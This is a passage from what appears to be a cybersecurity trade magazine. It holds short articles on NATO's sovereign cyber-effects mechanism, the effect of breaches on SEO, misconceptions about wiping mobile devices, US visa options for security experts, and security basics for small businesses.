and the back-end server.<br />

Final Thoughts<br />

Nowadays, mobile app security is one of the most vital aspects of developing an application that app<br />

developers need to consider during every step of the development process.<br />

Mobile apps that are insecure can fall prey to online hackers that can misuse the sensitive information of<br />

a user, such as financial information. The above-mentioned practices that prove to be of great help in<br />

securing your mobile apps and users' crucial data as well.<br />

About the Author<br />

Twinkle is the product head of MobileAppDaily and keeps a close eye on the<br />

latest and trending tech releases. With her wise taste of the tech industry, she<br />

has single-handedly created recognizable brand image.<br />

115


Sovereign <strong>Cyber</strong> Effects Provided Voluntarily by Allies<br />

(SCEPVA)<br />

The Devil is in the Kilobyte<br />

By Wiesław Goździewicz, Expert, Kościuszko Institute<br />

NATO has gone a long way in development of its<br />

policy on cyber operations. The three most<br />

recent Summits in Wales (2014) Warsaw (2016)<br />

and Brussels represent true milestones in this<br />

regard. In Wales,. Allies confirmed (a year ahead<br />

of the 2015 UN GGE Consensus report) full<br />

applicability of International Law to cyberspace.<br />

This would also include International<br />

Humanitarian Law (IHL) or the Law of Armed<br />

Conflict (LOAC). Inclusion of IHL/LOAC in this<br />

declaration is particularly important, as during<br />

the Wales Summit NATO has also declared that<br />

cyber incident of certain gravity may be<br />

considered as an armed attack and trigger an<br />

Article 5 (collective defence) response by the<br />

Alliance. Thus, NATO confirmed hat cyber<br />

defence is part of NATO's core task of collective<br />

defence.<br />

Another breakthrough happened during Warsaw<br />

Summit two years later. <strong>Cyber</strong>space has been<br />

considered as an operational domain, equivalent<br />

to air, land and sea. Member Nations have been<br />

called upon to build their cyber defence<br />

capabilities as efficient as those for the “physical”<br />

domains. This was reflected in the <strong>Cyber</strong><br />

Defence Pledge adopted during Warsaw<br />

Summit. The Pledge reaffirmed that obligations<br />

under Article 3 of the Washington treaty (building<br />

defence capabilities both individually and in<br />

116


cooperation with other Allies) also apply to cyber<br />

defence capabilities. The Allies also pledged to<br />

strengthen and enhance the cyber defences of<br />

national networks and infrastructures as a matter<br />

of priority, as well as to improve its resilience and<br />

ability to respond quickly and effectively to cyberattacks.<br />

As a follow-up from the decisions made in<br />

Warsaw, the North Atlantic Council adopted a<br />

10-point “<strong>Cyber</strong> as a Domain Implementation<br />

Roadmap”, which addresses the requirements to<br />

adopt e.g. doctrine and policy, trainings and<br />

exercises, operations planning and strategic<br />

communications (also as part of cyber<br />

deterrence). It also called for the revision of<br />

NATO Rules of Engagement for these to<br />

address the specificities of cyberspace<br />

operations. Delivery of the Roadmap is very<br />

advanced, with certain requirements already<br />

met. However, from an operational perspective,<br />

the most important aspects of the Roadmap are<br />

the integration of cyber effects and the cyber<br />

doctrine development as they are closely related<br />

to each other.<br />

<strong>November</strong> 2017 Defence Ministerial brought the<br />

decision to integrate Allies’ national cyber<br />

capabilities into NATO missions and operations.<br />

While nations maintain full ownership of those<br />

capabilities, just as Allies own the tanks, the<br />

ships and aircraft in NATO missions, cyber<br />

capabilities offered by them in support of Allied<br />

Operations and missions are to remain under<br />

strict political oversight and within the remits of<br />

compliance with International Law.<br />

Most recent Brussels Summit brought significant<br />

momentum into the process of NATO’s<br />

adaptation to contemporary security challenges,<br />

including cyber. Adopted and reinforced NATO<br />

Command Structure now includes the<br />

<strong>Cyber</strong>space Operations Centre (CyOC). Being<br />

‘eyes and ears’ of the respective commanders in<br />

cyberspace, the CyOC is supposed to enhance<br />

situational awareness in cyberspace and help<br />

integrate cyber into NATO’s planning and<br />

operations at all levels. It will not be a cyber<br />

command centre as there will not be any<br />

supranational command. While the CyOC is to<br />

operate within the existing NATO frameworks, its<br />

main aim is to equip the Supreme Allied<br />

Commander Europe (SACEUR) with all the<br />

necessary tools to operate in cyberspace. As will<br />

be discussed below, CyOC is responsible for<br />

coordinating Sovereign <strong>Cyber</strong> Effects Provided<br />

Voluntarily by Allies (SCEPVA). Second main<br />

task of the CyOC is to provide situational<br />

awareness and coordination of NATO<br />

operational activity within cyberspace.<br />

The SCEPVA mechanism can be considered as<br />

cutting the Gordian knot of dilemmas related to<br />

the use of offensive cyber capabilities by NATO.<br />

Dilemmas, NATO has struggled with since the<br />

adoption of the first cyber defence policy in 2008:<br />

how to address cyber threats, including those of<br />

military character, without resolve to offensive<br />

cyber means and capabilities, which for many<br />

years have been considered<br />

as a kind of taboo. The Alliance, in its efforts to<br />

keep the moral high grounds, has been<br />

condemning state and non-state actors for the<br />

use of broad range cyber capabilities against<br />

NATO and its member states, from purely<br />

criminal, through terrorist and in support of<br />

hybrid activities, to offensive use of military cyber<br />

capabilities such as the ones Russia exercised<br />

against Georgia in 2008.<br />

At the same time, officially the Alliance has<br />

interpreted its defensive mandate and purpose<br />

in an overly restrictive manner by claiming that in<br />

cyberspace, NATO shall only exercise defensive<br />

operations, thus even preventing active cyber<br />

defence under NATO “umbrella”. This seemed to<br />

be a significant shortfall and disadvantage<br />

compared to both the “physical” domains and<br />

potentially adversarial actors. At the same time,<br />

certain NATO Member States have openly<br />

117


declared that they would develop offensive cyber<br />

capabilities (of note: the U.S. declared<br />

cyberspace as an operational domain already in<br />

2008).<br />

Such an approach to cyber capabilities had no<br />

logical rationale behind it. NATO has never<br />

funded<br />

a common armament programme meant at<br />

development of offensive capabilities. All such<br />

programmes have been of a non-offensive<br />

nature: Intelligence, Surveillance and<br />

Reconnaissance (ISR), strategic airlift, Airborne<br />

Early Warning and Control (AWACs), etc. Yet<br />

again, nobody had doubts that defensive<br />

mandate does not preclude, should not preclude,<br />

the development of offensive capabilities by<br />

individual Member Nations or collectively by<br />

them. Defence capabilities must include<br />

offensive means: howitzers, tanks, attack<br />

aircraft, cruise missiles etc. And NATO on<br />

numerous occasions has reached to its<br />

members for such capabilities to be provided<br />

(the best example is the 1999 operation “Allied<br />

Force”, which was not defensive, but purely a<br />

peace enforcement operation).<br />

Thus, the decisions to prevent active cyber<br />

defence or the possibility to use offensive cyber<br />

capabilities, have been a significant limiting<br />

factor for those, who had been tasked to plan<br />

certain Allied operations and missions.<br />

Moreover, given the fact that after Wales Summit<br />

in 2014 NATO mad it clear that a grave cyber<br />

incident might be considered as an armed attack<br />

and trigger an Article 5 response, theoretically<br />

NATO would only be able to respond<br />

“conventionally”, “kinetically”. While a responsein-kind<br />

is not required under International Law in<br />

case of an armed attack, one has to remember<br />

that national self-defence has to be imminent,<br />

proportionate and necessary.<br />

There is no doubt that cyber means or methods<br />

of warfare, or more broadly – cyber capabilities<br />

– are not by nature illegal. Moreover, they can be<br />

used in a manner that fully complies with the<br />

requirements of International Law. One could<br />

argue, that in terms of LOAC compliance, if used<br />

properly, cyber means can be the most<br />

discriminate, the most humane and the most<br />

proportionate means and methods of warfare.<br />

Response with cyber means to a cyber attack<br />

might also (in certain circumstances) be<br />

considered as those who best fulfil the<br />

requirements of proportionality and necessity of<br />

acts in self-defence.<br />

Since NATO des not develop offensive cyber<br />

capabilities (but neither does it for “conventional”<br />

domains) and for any offensive capabilities the<br />

Alliance has to reach out to its Member States,<br />

given the long-standing practice of “NATO does<br />

not go offensive in cyberspace”, the SCEPVA<br />

mechanism seems to be the only solution to the<br />

theoretically unsolvable problem: how to<br />

efficiently defend the Allies in all domains (incl.<br />

cyberspace) without “going offensive in<br />

cyberspace”. <strong>Cyber</strong>-capable Nations may be<br />

requested to deliver offensive cyber effects on a<br />

target designated by an operational-level<br />

commander. And it will be the CyOC who is<br />

going to be responsible for matching the<br />

expectations of the commanders with the<br />

willingness and capabilities of the nations<br />

potentially able to deliver such effects.<br />

Officially, NATO will not be “going offensive in<br />

cyberspace”, while being able to apply all<br />

instruments of military power, all spectrum of<br />

effects. Such a solution does not come without a<br />

price, though.<br />

Firstly, the operational-level commanders who<br />

normally “own” the targeting process and decide<br />

which effects to deliver on a given target and<br />

how to deliver the effect, will not be able to task<br />

any nation to provide such effect. As opposed to<br />

“conventional” means and capabilities, cyber<br />

effects will not be handed over to the<br />

118


operational-level commander, as opposed to<br />

other means and capabilities, which upon<br />

appropriate transfer of authority will fall under the<br />

NATO commander’s command and control. And<br />

even if the effect is delivered upon operationallevel<br />

commander’s request, nation delivering it<br />

will do it on a “I will tell you what I can do, but not<br />

how”. That’s the meaning of the word<br />

“Sovereign” in the SCEPVA construct.<br />

Secondly, there might be no nation willing to fulfil<br />

the request, even if there were Allied Nations<br />

able to or capable of fulfilling it. For several<br />

reasons, including the desire to retain certain<br />

capabilities for own use, strategic purposes, etc.<br />

That’s the meaning of the word “voluntarily” in<br />

the SCEPVA construct.<br />

Last, but not least, it still has to be determined,<br />

where responsibility would lie for potential<br />

internationally wrongful use of such cyber<br />

effects. For example, if as a result of the use of<br />

SCEPVA, excessive incidental losses occur,<br />

thus constituting the breach of the LOAC<br />

principle of proportionality, which nation would<br />

bear the responsibility? Nation voluntarily<br />

delivering the cyber effect? Or the Sending<br />

Nation of the operational-level commander<br />

requesting such an effect to be delivered? Or<br />

perhaps the Sending Nation of the Staff Officer<br />

proposing the employment of SCEPVA on this<br />

particular target in the course of the target<br />

nomination/approval process?<br />

Indeed, the devil is in the detail. When it comes<br />

to SCEPVA, the details can be broken down to<br />

kilobytes. How many devils would fit into a<br />

kilobyte?<br />

About the Author<br />

wieslaw.gozdziewicz@gmail.com; https://ik.org.pl<br />

Wiesław Goździewicz is a retired Polish Navy officer, a lawyer<br />

specialised in Public International Law, in particular legal<br />

aspects of military operation. Expert of the Kościuszko<br />

Institute in the field of cybersecurity, dealing mainly with legal<br />

aspects thereof. Former Legal Advisor of the NATO Joint<br />

Force Training Centre in Bydgoszcz, Poland. Speaker among<br />

others at the European <strong>Cyber</strong>security Forum and Warsaw<br />

Security Forum, guest lecturer of the Polish Naval Academy,<br />

War Studies Academy in Warsaw, Nicolaus Copernicus<br />

University in Torun and NATO School Oberammergau.<br />

119


How <strong>Cyber</strong>security Became a Major Issue for Your Business’<br />

SEO<br />

By Chester<br />

<strong>Cyber</strong>security is no longer a niche issue that you can afford to ignore. Every year, half of all businesses<br />

report being hacked, and this can cause huge problems with the smooth running of organisations. But<br />

you might not realise that one of the big issues that cyber breaches effect is search engine optimisation<br />

(SEO).<br />

In the past you might not have thought about the link between cyber security and SEO, but it has now<br />

become a very large problem. In this article we take a look at how your business’ SEO efforts could be<br />

put at risk by cyber breaches, as well as looking at what you can do to mitigate risk.<br />

The problem of downtime<br />

One of the major issues that a cyber breach can cause for your site is downtime. Not only can a cyberattack<br />

take your website offline, you may also need to have further time without your website live in order<br />

to fix the issue. But lengthy periods of downtime can be a nightmare from an SEO perspective.<br />

120


When Google sees that your site is down, it recognises that you are having problems. If this is only for a<br />

short period of time, it is unlikely to have a negative effect. But Google’s sophisticated algorithm<br />

understands that if a site is down for an extended period, there are more serious problems.<br />

Google hacked site warning<br />

When Google notices that a website has been compromised, it will often display warning text in its listings.<br />

This warning text reads: “This site may be hacked”. If you see this text against your site, then Google<br />

believes that you are having a cyber security problem.<br />

Once again, in terms of SEO this is bad news, as user behaviour is taken into account by Google’s<br />

RankBrain algorithm. When users see a hacked site warning, they are less likely to click on your listing.<br />

Site reviews<br />

Did you know that reviews about becoming important as a ranking factor under Google’s algorithm?<br />

Google likes to see sites getting positive reviews, and is concerned when a site gets a lot of negative<br />

ratings. This is where a cyber attack can impact your SEO.<br />

If your site is hacked then users are more likely to give a bad review due to the issue. As these negative<br />

ratings build up, they can see your site fall in the rankings.<br />

Common cyber-attacks that could damage your SEO<br />

There are many ways that cyber criminals might attempt to compromise your site, all of which can have<br />

the kind of impact on SEO that has been mentioned above. Here we will take a look at some of the most<br />

common cyber attacks that can damage SEO – as well as what you can do to defend your business<br />

against them.<br />

• WordPress plugins and extensions – one of the first things to consider when a site has been<br />

hacked is whether this is due to outdated software. As WordPress is so popular, it is a very<br />

common choice for cyber criminals who can take advantage of plugins that have not been updated<br />

to their latest version. Of course, this is one cyber security issue that can dealt with easily – allot<br />

time for plugins and extensions to be updated on a regular basis<br />

• Phishing – unfortunately it is still the case that your members of staff are often the unwitting<br />

reason that your site is hacked. Staff can fall for phishing attacks such as emails that direct them<br />

to spoofed sites – these are then used to steal their details. The key here is the need to provide<br />

your staff with adequate training.<br />

• Bots – another very common form of cyber attack is trough malicious bots that are designed to<br />

bypass your perimeter defences. A bot attack can take your website down entirely, or you might<br />

face performance issues. Malicious bots can be difficult to defend against, and will require<br />

specialist assistance from cyber security professionals.<br />

121


Ultimately, cyber security has now become an issue that highly relevant to your SEO efforts, and this<br />

needs to reflect in the amount of time and budget you put into your security work. This is the only way to<br />

minimise the risk that you could be hacked, and that this hack could burden your optimisation.<br />

About the Author<br />

Chester is an independent cybersecurity specialist. Chester Avey has<br />

over a decade of experience in business growth management. He<br />

enjoys sharing his knowledge with other like-minded professionals<br />

through his writing. Find out what else Chester has been up to on<br />

Twitter:<br />

Chester Avey can be reached online at chesteravey@outlook.com &<br />

@Chester15611376.<br />

122


How to Erase Data from Mobile Devices: Four Common<br />

Misconceptions<br />

By Mark Dobson, ITAD Specialist,NextUse<br />

When you’re about to retire dozens or hundreds of your employees’ mobile devices, you don’t want the<br />

company data stored on them to end up in the hands of your competitors or criminals.<br />

“Companies tend to overlook IT asset disposition as their mobile devices reach end-of-life,” according to<br />

Jeff Londres, founder and CEO of NextUse, a certified ITAD company. “This misstep not only puts them<br />

at risk of a data breach, but it also means their assets lose residual value from resale. Cell phone values<br />

drop the older a model gets, but they may still be worth decent money even going back several versions.”<br />

Here are four commonly misused steps that will NOT wipe the data off those devices:<br />

1. Reset the phone to factory settings<br />

123


• This doesn’t actually erase any data, it simply removes your ability to see and access it,<br />

just like the way reformatting a hard drive on a desktop or laptop computer clears the File<br />

Allocation Table (FAT)<br />

• The data can be retrieved by recovery software<br />

• Data on SD cards and SIM is not affected<br />

• Numerous studies have shown the ineffectualness of this method<br />

2. Pull the Subscriber Identification Module (SIM card)<br />

• The SIM stores subscriber information to enable communication between the phone and<br />

its carrier<br />

• It only contains up to 128 KB of memory to store things like contacts, phone numbers, text<br />

messages, data usage and billing information<br />

3. Pull the Secure Digital micro (SD) card expansion memory<br />

• This only eliminates the data stored on that removable media<br />

• It leaves all the data stored on the device’s internal flash memory storage, which can range<br />

from eight to 256 gigabytes<br />

4. Select the cheapest IT asset disposition vendor for resale or recycling<br />

• Recyclers and resellers may incorrectly assume that one or more of the above methods<br />

is adequate before selling your phone and all its data on the secondary market<br />

• A vendor without the proper data security/destruction certifications and oversight can be<br />

doing anything with your company’s valuable data<br />

One Easy Way to Erase Data from Your Company’s Retired Mobile Devices<br />

To keep your company’s data from falling into the wrong hands, choose a specialized ITAD vendor that<br />

is certified specifically in data security and destruction of all data-bearing IT assets, and has oversight<br />

from a certifying body including random audits both at their facilities and onsite with clients.<br />

To keep your company’s data from falling into the wrong hands, choose a specialized ITAD vendor that<br />

is certified specifically in data security and destruction of all data-bearing IT assets, and has oversight<br />

from a certifying body including random audits both at their facilities and onsite with clients. Look for a<br />

company with multiple digital data destruction certifications from the National Association for Information<br />

Destruction (NAID), the recognized gold standard in the industry. Although there are around a thousand<br />

NAID AAA-certified vendors globally, only a handful have certification for all destruction methods of all<br />

drive types both at a company’s site and at the vendor’s facilities.<br />

Remember, using a slightly cheaper R2 or e-Stewards certified recycler instead of a NAID AAA-certified<br />

data destruction partner can put you at risk of an expensive data breach, the average of which is now<br />

almost $4 million.<br />

124


About the Author<br />

Mark Dobson is an ITAD Specialist at NextUse. Mark is an<br />

accomplished subject matter expert with over two decades of<br />

experience and expertise in the sales and marketing of information<br />

technology hardware, software, and services, copywriting, and<br />

copyediting. As an “IT savant,” he understands the business benefits<br />

and positioning of current, new, and cutting-edge technologies in order<br />

to enable businesses to increase market share and revenue. Mark<br />

specializes in highly sophisticated and new technology concepts such<br />

as the Internet of Things, artificial intelligence, machine learning, natural<br />

language processing, software-defined networking, data centers, and<br />

infrastructure, gamification, etc.<br />

Mark can be reached online at mark.dobson@nextuse.us and at our company website<br />

https://www.nextuse.us<br />

125


Secure Data Is Gold: U.S. Immigration Options for<br />

<strong>Cyber</strong>security Experts<br />

By Lin Rose Walker, Esq. and Scott R. Malyk, Esq.<br />

A decade ago, very few people outside of the Information Technology (IT) industry knew what<br />

cybersecurity was or even considered it something worth worrying about. Many of us naively believed<br />

that with the right passwords, encryption software and firewalls, our data and information would be<br />

secure.<br />

In recent years, however, our world has become far more technologically advanced and, as a<br />

consequence, technologically dependent. Nearly every occupation and industry has developed uses for<br />

data, whether it be used for artificial intelligence, machine learning, CRM or other applications, whether<br />

it is banking, retail, pharmaceutical, medical, oil &gas, agricultural or elsewhere.<br />

Because the collection, processing and use of data has become such a valuable asset for so many<br />

companies and industries, we are experiencing a generational shift in computing, with nearly every<br />

company, small and large, seeking to move networks, servers, data warehouses and virtualization<br />

software functions and components to a cloud-based infrastructure. Indeed, a company’s adoption of<br />

cloud-based technology, with appropriate safeguards, has become first priority for most Chief Information<br />

Officers (CIOs), thus, skyrocketing the use for cloud technology.<br />

126


With this major shift to cloud-based computing, it’s no surprise that cyber vulnerabilities within cloud<br />

technology are also on the rise. So, in addition to migrating to the cloud in order to provide innovative<br />

services that enhance business and drive transformations, CIOs must also be cognizant of the evergrowing<br />

cybersecurity threats to such cloud-based technologies.<br />

While these advances in data and technology have made our lives easier in many respects, they have<br />

also created significant opportunities for individuals and organizations to use the same technology to<br />

commit cybercrimes. Although cybersecurity is neither a new or emerging field, there has been something<br />

of a collective epiphany in the United States regarding the essential and significant role it plays in our<br />

everyday lives, particularly since 2016. Since that time, there have been daily reports of cybersecurity<br />

crimes, ranging from denials of service, to hacks and breaches of personal, financial and confidential<br />

information, to election meddling. Some of the most noteworthy examples of these damaging crimes<br />

include:<br />

• September 2017 – Equifax announced a data breach that exposed the personal information of<br />

147 million people in the United States;<br />

• March <strong>2019</strong> – Capital One Bank experienced a data breach that exposed the personal information<br />

of nearly 106 million of the bank’s customers and credit card applicants;<br />

• April <strong>2019</strong> – Facebook experienced a data breach that exposed 540 million user records on<br />

Amazon’s cloud computing service; and<br />

• June <strong>2019</strong> – American Medical Collection Agency, a third-party billing collections firm which<br />

provides services for LabCorp and Quest Diagnostics experienced a data breach in which the<br />

personal, financial and medical data of 7.7 million LabCorp patients and 12 million Quest<br />

Diagnostics patients were disclosed.<br />

• August <strong>2019</strong> – Twitter CEO Jack Dorsey’s Twitter account was hacked on August 30 by a group<br />

that calls itself the Chuckle Squad. The hackers tweeted racial slurs, antisemitic messages and<br />

at least one Holocaust denial from Dorsey’s account.<br />

In addition to these hacks and breaches, the use of ransomware has dramatically increased as well.<br />

Ransomware is a type of cyberattack that encrypts a computer’s files (and makes unavailable to the<br />

owner/user of such data), in which the owner/user of the data must pay the attacker a “ransom” often in<br />

bitcoin or some other untraceable cryptocurrency to release the files. Since 2013, more than 170 U.S.<br />

county-, city- and state-government systems have been attacked using ransomware, including at least<br />

45 law enforcement offices. (https://www.cnn.com/<strong>2019</strong>/05/10/politics/ransomware-attacks-uscities/index.html)<br />

Most recently, on August 20 th , the State of Texas reported that twenty-three (23) towns<br />

127


were struck by a coordinated ransomware attack. (https://www.cnbc.com/<strong>2019</strong>/08/19/alarm-in-texas-as-<br />

23-towns-hit-by-coordinated-ransomware-attack.html)<br />

The prevalence of cybersecurity crimes, and their significant impact, became abundantly clear in the<br />

wake of the 2016 Presidential election, which experienced malicious hackings and massive breaches of<br />

campaign voter data, including hacking of election systems. (https://cdt.org/issue/internetarchitecture/election-cybersecurity/)<br />

As our election and voting systems become more data-driven and<br />

electronic, our nation becomes more susceptible to such cyberattacks, which have and will continue to<br />

impact our voting practices and democratic norms.<br />

(https://www.washingtonpost.com/news/powerpost/paloma/the-cybersecurity-202/<strong>2019</strong>/07/15/thecybersecurity-202-here-s-an-overlooked-election-cybersecurity-danger-outdatedsoftware/5d2bc0321ad2e552a21d53d4/)<br />

In an effort to protect our financial, personal, medical, and otherwise confidential or personal data, as<br />

well as our election systems, we need to continue to attract and employ the services of the most qualified<br />

cybersecurity experts from around the world. However, at present, there is a dire shortage of such<br />

qualified experts in the United States. On January 10, <strong>2019</strong>, Jon Oltsik, Chief Security Officer of<br />

Enterprise Strategy Group (ESG) and a world renowned cybersecurity expert wrote:<br />

At the end of each year, ESG conducts a wide-ranging global survey of IT professionals, asking<br />

them about challenges, purchasing plans, strategies, etc. As part of this survey, respondents were<br />

asked to identify areas where their organization has a problematic shortage of skills.<br />

In 2018-<strong>2019</strong>, cybersecurity skills topped the list — 53 percent of survey respondents reported a<br />

problematic shortage of cybersecurity skills at their organization. IT architecture/planning skills<br />

came in second at 38 percent.<br />

The cybersecurity skills shortage is nothing new. Alarmingly, the cybersecurity skills deficit has<br />

held the top position in ESG’s annual survey every year... Furthermore, the percentage of<br />

organizations reporting a problematic shortage of cybersecurity skills continues to increase.<br />

****<br />

Now, people like me have been talking about the cybersecurity skills shortage for years, and there<br />

are a lot of worthwhile industry and academic programs in place to address this issue. Despite<br />

these efforts, however, research from ESG and others indicates that the cybersecurity skills<br />

shortage is getting incrementally worse each year. (Emphasis added.)<br />

128


(https://www.csoonline.com/article/3331983/the-cybersecurity-skills-shortage-is-gettingworse.html)<br />

Our technology and data infrastructure need significant work to keep them safe from hacks, breaches<br />

and ransomware attacks, but there are simply not enough qualified professionals in the U.S. to fill this<br />

need. In this regard, our business leaders and corporations must be open to recruiting and retaining<br />

qualified foreign nationals who possess the requisite skills, education and expertise to perform these<br />

duties.<br />

In addition to the standard-issue H-1B and L-1B visa classifications, there are a variety of immigration<br />

options available to U.S. employers who seek to hire foreign nationals with cybersecurity expertise. One<br />

of these options is the O-1A nonimmigrant classification for individuals of extraordinary ability in the<br />

sciences or business. This often overlooked nonimmigrant visa classification is available to a foreign<br />

national who can demonstrate a level of expertise among a small percentage who have risen to the top<br />

of the field. Individuals who have made original, documented contributions to the field, as evidenced by<br />

patents and/or publications, and have served as the judge of the work of others (journal reviewers/editors)<br />

or in essential/critical capacities can readily qualify for the O-1A visa classification.<br />

Another option available, which leads to permanent resident status in the United States, is the National<br />

Interest Waiver (NIW) petition. NIW petitions are typically granted to those who have exceptional ability<br />

and whose employment in the United States would greatly benefit our nation. <strong>Cyber</strong>security has proven<br />

to be an endeavor that is in the national interest of the United States. Thus, individuals seeking a NIW<br />

can establish exceptional ability through documented evidence confirming that they possess at least a<br />

Master’s degree in a specialized field of study related to cybersecurity; possess at least ten (10) years of<br />

full-time employment experience in the field of cybersecurity; are recognized for their achievements in<br />

cybersecurity; and have publications in the field.<br />

It is clear from the daily reports of cybersecurity crimes, that our nation is in dire need of cybersecurity<br />

experts who possess the resources and advanced knowledge, skills and experience required to combat<br />

these crimes. In this regard, as there is currently a shortage of U.S. workers who possess these qualities,<br />

U.S. corporations and governmental agencies should consider thinking “outside the box” as it relates to<br />

these immigration options in order to attract and recruit foreign nationals with this expertise.<br />

While there are many immigration options available for both temporary and permanent employment of<br />

cybersecurity experts, it is best to plan ahead and consult with an attorney in advance to identify which<br />

options best meet the goals of U.S. employer, the foreign national and most importantly, the national<br />

interests of our country.<br />

129


About the Authors<br />

Lin R. Walker and Scott R. Malyk are attorneys with<br />

Meyner and Landis LLP’s Immigration Law Group,<br />

specializing in all aspects of corporate and businessrelated<br />

US immigration law. Walker and Malyk<br />

represent a diverse group of corporate and individual<br />

clients in a variety of industries, with a special emphasis<br />

on researchers, developers, architects, engineers, data<br />

scientists and business people in the high tech industry<br />

nationwide, which includes individuals whose work is in<br />

the national interest of the United States.<br />

130


<strong>Cyber</strong>security Essentials for Small and Medium Businesses<br />

Protect your business from hackers by knowing some of the top cybersecurity essentials you should<br />

adapt within your organization.<br />

By Alex Hunter, Business Development Representative, ImageWare Systems<br />

Both government agencies and big companies like Target have been known to fail when it comes to<br />

maintaining cybersecurity. This makes small-to-medium-sized enterprises (SMEs) even more vulnerable<br />

when it comes to data breaches.<br />

<strong>Cyber</strong>criminals commonly attack SMEs because of their laxer cybersecurity measures. New business<br />

owners from various industries often have little to no knowledge of cybersecurity solutions and tend to<br />

make it the least of their priorities when starting. This is why many hackers and other types of<br />

cybercriminals target them.<br />

In fact, research from the US Congressional Small Business Committee indicates that 71% of<br />

cyberattacks occurred at companies with less than 100 in the workforce. To add, Verizon’s <strong>2019</strong> Data<br />

Breach Investigations Report found that over 43% of system breaches have affected small businesses.<br />

This is a cause for alarm, after considering the report published by the US National <strong>Cyber</strong> Security<br />

Alliance suggesting that approximately 60% of all small businesses fold up within six months following a<br />

major cybersecurity attack.<br />

131


Fortify your cybersecurity by looking out for the most common types of attacks<br />

<strong>Cyber</strong>criminals often tend to go for accessing sensitive business data like your clients’ identifying private<br />

information (names, birthdays, employment details, etc.), credit card data, and other info they can use to<br />

exploit your cyber vulnerability. Know some of the most common potential cyberattacks that can occur in<br />

today’s connected world.<br />

• Malware<br />

Shorthand for "malicious software,” malware refers to any software or program including worms, Trojans,<br />

spyware, and ransomware. When an attacker encounters vulnerable networks, they often enable<br />

unauthorized access to unknowing victims’ devices.<br />

• Phishing<br />

Hackers collect sensitive information such as credit card specifics and login credentials via fraudulent<br />

websites packaged to look authentic. Users are sent emails with links to these fake websites.<br />

• Password attacks<br />

Hackers can infiltrate accounts and networks, then modify settings in three ways. The first one is through<br />

a brute-force attack or guessing passwords to gain access. The second is through is a dictionary attack,<br />

which involves the use of software or program made to try various password combinations of known<br />

dictionary words. Lastly, keyloggers pilfer data by recording a user’s keystrokes on sites and apps.<br />

• Inside attack<br />

Rootkits are commonly used by perpetrators who have administrator-level access to specific devices to<br />

manipulate and collect user activity and sensitive data or change various settings.<br />

• Unsecured networks are vulnerable to Man in the Middle (MitM) cyberattacks<br />

When clients and companies exchange data to transact, hackers who use the MitM method facilitate the<br />

attack by installing malware that intrudes the flow of information to steal sensitive information. Unsecured<br />

public Wi-Fi networks are often vulnerable to this kind of approach, as this is where cybercriminals have<br />

installed malware that can analyze data.<br />

• Malicious mobile apps<br />

As workplaces continue to approve the use of private devices in the office, companies are becoming at<br />

risk of being infected by malicious apps that could easily be downloaded on Apple Store or Google Play.<br />

These apps have the power to monitor user info or spam the victim with digital advertisements.<br />

• Zero-day cyberattack<br />

Zero-day cyberattacks are major, system-wide problems that can go undetected by developers or<br />

cybersecurity teams for long periods of time. Attackers get a hold of your company’s cybersecurity flaws<br />

and use them against you in many ways unless detected and repaired.<br />

132


<strong>Cyber</strong>security essentials to remember<br />

Here are some vital strategies to prevent cyberattacks and data breaches on your small or medium<br />

business.<br />

1. Evaluate your cybersecurity system with available tools<br />

Some planning and assessment tools that can help SMEs evaluate cybersecurity threats in their system<br />

include the Federal Communications Commission’s <strong>Cyber</strong>planner.<br />

Two other platforms developed by the Department of Homeland Security (DHS) called <strong>Cyber</strong> Resilience<br />

Review (a non-technical assessment which can be self-service or done on-site by DHS experts) and<br />

cyber hygiene vulnerability scanning for SMBs can also help spot vulnerabilities within internet-facing<br />

ecosystems.<br />

2. Formalize and continue reviewing your cybersecurity policies and needs<br />

A 2017 Research by Ipsos suggests that an alarming rate of over 39% of SMBs have defined<br />

cybersecurity policies despite its importance. Having formal policies for cybersecurity is highly essential<br />

for businesses of any size. It serves as a document that enumerates rules regarding digital security,<br />

controls, and security policies when it comes to the use of gadgets or mobile devices.<br />

This can also include topics from onboarding new hires, access to sensitive company data, protocols on<br />

revoking access to business information upon employee termination, and many more. Since digital<br />

technologies and rules may change swiftly without warning, you should also regularly visit your policies<br />

to make sure that you are up to speed with the latest or emerging cybersecurity trends.<br />

3. Train employees on relevant cybersecurity policies<br />

All personnel and employees within an organization are required to undergo some level of training when<br />

it comes to cybersecurity guidelines and best practices unique to your organization.<br />

Some simple policies you could implement from the get-go include the encouragement to use strong,<br />

unique passwords for all their work-relevant accounts or files, training them on identifying the signs of a<br />

malware attack or phishing, and making them aware of cyberattack risks that can pose security threats<br />

like public Wi-Fi networks outside the workplace.<br />

4. Utilize authentic and updated antivirus, anti-malware, or antispyware software, and<br />

hardware- or software-based firewall system<br />

Anti-malware software for small businesses is one of your first wall of defenses against viruses and many<br />

types of attacks. Such software can be found online with a simple search. Online software vendors<br />

regularly update these downloadable products with patches and various upgrades to improve numerous<br />

functionalities, so you should always be on the lookout for those.<br />

Aside from upfront or maintenance costs, take factors such as privacy policies, customer support<br />

services, configurability, and overall system impact into account when looking for antivirus software.<br />

133


5. Employ additional data security measures<br />

Protecting your business from cybersecurity threats should be one of your top priorities. Depending on<br />

the extent of protection you need after your assessment, you may continue improving your security<br />

measures with additional access-restricting features.<br />

Some additional security measures you can employ to protect your business and client information further<br />

include the use of multifactor identification for accessing sensitive information, data backup solutions like<br />

online cloud backups and network-attached storage, encryption software, and password security<br />

software.<br />

Conclusion<br />

Digital threats abound for SMEs that do not place importance on data security. You do not necessarily<br />

have to splurge on the latest hardware, software, or dedicated IT service, whether offshore or within the<br />

organization.<br />

Adapting the essential tips covered, such as accurately evaluating your cybersecurity risks and needs,<br />

establishing clear-cut rules and policies, training employees, using proven antivirus or antispyware<br />

software, and adopting additional data security measures for multi-layered protection as needed will work<br />

for increasing your defenses against ill-intentioned hackers.<br />

About the Author<br />

Alex Hunter is a Business Development Representative from ImageWare<br />

Systems. She has spent the past 8 years working to develop market<br />

awareness of, what is now recognized to be, one of the world’s leading<br />

2FA/Multi-Factor Biometric Authentication solutions available today. Alex<br />

can be reached online at https://www.linkedin.com/in/alex-hunter-<br />

724297179 and at our company website https://iwsinc.com.<br />

134


New <strong>Cyber</strong>security Trend: Hackers Impersonating Other<br />

Hackers<br />

By Jonathan Drake, Senior Intelligence Analyst at Optiv Security<br />

<strong>Cyber</strong> threat intelligence usually categorizes threat actors in fixed classes. While these classes may vary<br />

from organization to organization, typical threat actor groups will include: 1) Nation-State Threat Actors,<br />

focusing on government interests and espionage-based activities; 2) <strong>Cyber</strong>-Crime, individuals/groups<br />

